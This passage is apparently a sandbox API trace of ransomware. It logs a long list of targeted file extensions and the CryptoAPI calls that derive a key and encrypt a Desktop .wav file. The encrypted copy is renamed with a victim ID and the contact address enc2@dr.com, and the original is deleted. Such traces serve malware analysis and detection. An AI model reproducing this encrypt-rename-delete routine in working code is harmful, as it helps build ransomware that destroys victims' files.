b.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".wav") returned=".wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0181.606] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0181.606] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0181.607] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\dglt_u_s.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\dglt_u_s.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0181.611] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x15f97, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x15f97, lpOverlapped=0x0) returned 1
	[0181.614] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.614] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb000) returned 1
	[0181.616] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.616] CryptCreateHash (in: hProv=0xfcb000, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0181.616] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.616] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0181.617] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.617] CryptDeriveKey (in: hProv=0xfcb000, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9b30) returned 1
	[0181.617] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.617] CryptEncrypt (in: hKey=0xfb9b30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x15f97, dwBufLen=0x15f97 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x15fa0) returned 1
	[0181.619] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.619] RtlMoveMemory (in: Destination=0xff3120, Source=0xfdd180, Length=0x15f97 | out: Destination=0xff3120) 
	[0181.619] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.619] CryptEncrypt (in: hKey=0xfb9b30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff3120*, pdwDataLen=0x18bc0c*=0x15f97, dwBufLen=0x15fa0 | out: pbData=0xff3120*, pdwDataLen=0x18bc0c*=0x15fa0) returned 1
	[0181.622] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.622] CryptDestroyKey (hKey=0xfb9b30) returned 1
	[0181.622] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.622] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0181.623] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.623] CryptReleaseContext (hProv=0xfcb000, dwFlags=0x0) returned 1
	[0181.623] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.623] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0181.624] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.624] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0181.625] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\dglt_u_s.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 84
	[0181.625] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\dglt_u_s.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\dglt_u_s.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0181.626] WriteFile (in: hFile=0x388, lpBuffer=0xff3120*, nNumberOfBytesToWrite=0x15fa0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xff3120*, lpNumberOfBytesWritten=0x18c068*=0x15fa0, lpOverlapped=0x0) returned 1
	[0181.952] CloseHandle (hObject=0x388) returned 1
	[0181.953] CloseHandle (hObject=0x384) returned 1
	[0181.953] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\dglt_u_s.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\dglt_u_s.wav")) returned 1
	[0181.989] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\dglt_u_s.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\dglt_u_s.wav")) returned 0
	[0181.989] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3e492f0, ftCreationTime.dwHighDateTime=0x1d96999, ftLastAccessTime.dwLowDateTime=0x37c6af70, ftLastAccessTime.dwHighDateTime=0x1d96e2a, ftLastWriteTime.dwLowDateTime=0x37c6af70, ftLastWriteTime.dwHighDateTime=0x1d96e2a, nFileSizeHigh=0x0, nFileSizeLow=0x112d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="EVfXH0jnZn86.swf", cAlternateFileName="EVFXH0~1.SWF")) returned 1
	[0181.989] lstrcmpW (lpString1="EVfXH0jnZn86.swf", lpString2="..") returned 1
	[0181.989] lstrcmpW (lpString1="EVfXH0jnZn86.swf", lpString2=".") returned 1
	[0181.990] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0181.990] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="EVfXH0jnZn86.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\EVfXH0jnZn86.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\EVfXH0jnZn86.swf"
	[0181.990] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\EVfXH0jnZn86.swf") returned 46
	[0181.990] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0181.990] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\EVfXH0jnZn86.swf", cchLength=0x2e | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\evfxh0jnzn86.swf") returned 0x2e
	[0181.990] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.990] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\evfxh0jnzn86.swf", lpSrch="help_decrypt_your_files") returned 0x0
	[0181.990] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\evfxh0jnzn86.swf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\evfxh0jnzn86.swf") returned="c:\\users\\rdhj0cnfevzx\\desktop\\evfxh0jnzn86.swf"
	[0181.991] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\evfxh0jnzn86.swf") returned 46
	[0181.991] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.991] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.991] StrStrW (lpFirst=".swf", lpSrch=".") returned=".swf"
	[0181.991] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.991] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx